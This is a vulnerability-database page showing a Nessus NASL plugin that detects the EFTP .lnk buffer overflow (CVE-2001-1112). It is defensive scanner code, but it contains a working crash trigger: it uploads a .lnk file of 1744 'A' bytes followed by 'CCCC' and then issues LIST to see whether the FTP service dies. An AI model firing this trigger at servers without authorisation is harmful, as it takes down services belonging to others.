Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.EFTP_BUFFEROVERFLOW.NASL
HistoryMar 29, 2002 - 12:00 a.m.

EFTP .lnk File Handling Remote Overflow

2002-03-2900:00:00
This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
www.tenable.com
7
JSON

The version of EFTP running on the remote host has a remote buffer overflow vulnerability. Issuing the LS command on a maliciously crafted .lnk file results in an overflow. A remote attacker could exploit this to crash the service, or possibly execute arbitrary code.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(10928);
 script_bugtraq_id(3330);
 script_version("1.29");
 script_cve_id("CVE-2001-1112");

 script_name(english:"EFTP .lnk File Handling Remote Overflow");
 script_summary(english:"EFTP buffer overflow");
 
 script_set_attribute(
   attribute:"synopsis",
   value:"The remote FTP server has a buffer overflow vulnerability."
 );
 script_set_attribute(attribute:"description", value:
"The version of EFTP running on the remote host has a remote buffer
overflow vulnerability.  Issuing the LS command on a maliciously
crafted .lnk file results in an overflow.  A remote attacker could
exploit this to crash the service, or possibly execute arbitrary code." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/2001/Sep/135"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to EFTP 2.0.8.x or later."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/03/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/09/12");
 script_cvs_date("Date: 2018/11/15 20:50:22");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_MIXED_ATTACK);
 script_family(english:"FTP");
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");

 script_require_ports("Services/ftp", 21);
 script_dependencie("ftpserver_detect_type_nd_version.nasl", "ftp_anonymous.nasl");

 exit(0);
}

#

include("ftp_func.inc");

port = get_ftp_port(default: 21);

user_login = get_kb_item("ftp/login");
user_passwd = get_kb_item("ftp/password");
writeable_dir = get_kb_item("ftp/"+port+"/writeable_dir");
if (! writeable_dir) writeable_dir = get_kb_item("ftp/writeable_dir");
use_banner = 1;

if (user_login && user_passwd && writeable_dir)
{
 use_banner = safe_checks();
}

if (use_banner)
{
 banner = get_ftp_banner(port: port);
 if(egrep(pattern:".*EFTP Version 2\.0\.[0-7]\.", string:banner))
 {
  report = "
*** Nessus detected this solely based on the
*** FTP server's banner. Use caution when
*** testing without safe checks enabled.
";
  security_hole(port:port, extra:report);
 } 
 exit(0);
}

soc = open_sock_tcp(port);
if (!soc) exit(1);

r = ftp_authenticate(socket:soc, user:user_login, pass:user_passwd);
if (!r) 
{
 ftp_close(socket: soc);
 exit(1, "Cannot authenticate on port "+port+".");
}

# Go to writeable dir
cmd = strcat('CWD ', writeable_dir, '\r\n');
send(socket:soc, data:cmd);
a = recv_line(socket:soc, length:1024);

f_name = strcat('ness', rand()%10, rand()%10, rand()%10, rand()%10, '.lnk');

# Upload a buggy .LNK
port2 = ftp_pasv(socket:soc);
soc2 = open_sock_tcp(port2, transport:get_port_transport(port));
if ( ! soc2 ) exit(0);
cmd = strcat('STOR ', f_name, '\r\n');
send(socket:soc, data:cmd);
r = recv_line(socket:soc, length:1024);	# Read the 3 digits ?
if(ereg(pattern:"^5[0-9][0-9] .*", string:r)) exit(0);


d = strcat(crap(length:1744, data: 'A'), 'CCCC');
send(socket:soc2, data:d);
close(soc2);

# Now run DIR
cmd = 'LIST\r\n';
send(socket:soc, data:cmd);
r = recv_line(socket: soc, length: 1024);
ftp_close(socket: soc);

# Now check if it is still alive
soc = open_sock_tcp(port);
if (! soc)
{
 report = "
Nessus crashed the FTP server in the course of detecting this
vulnerability.
";
 security_hole(port:port, extra:report);
}

# Or clean mess :)

if (soc)
{ 
 ftp_authenticate(socket:soc, user:user_login, pass:user_passwd);
 cmd = strcat('CWD ', writeable_dir, '\r\n');
 send(socket:soc, data:cmd);
 r = recv_line(socket:soc, length:1024);
 cmd = strcat ('DELE ', f_name, '\r\n');
 send(socket:soc, data:cmd);
 r = recv_line(socket:soc, length:1024);
 ftp_close(socket: soc);
}

Related

openvas 2
cve 1
openvas
openvas
EFTP buffer overflow
2005-11-03 00:00:00
EFTP buffer overflow
2005-11-03 00:00:00
cve
cve
CVE-2001-1112
2001-09-12 04:00:00
JSON
Related for EFTP_BUFFEROVERFLOW.NASL
openvas2cve1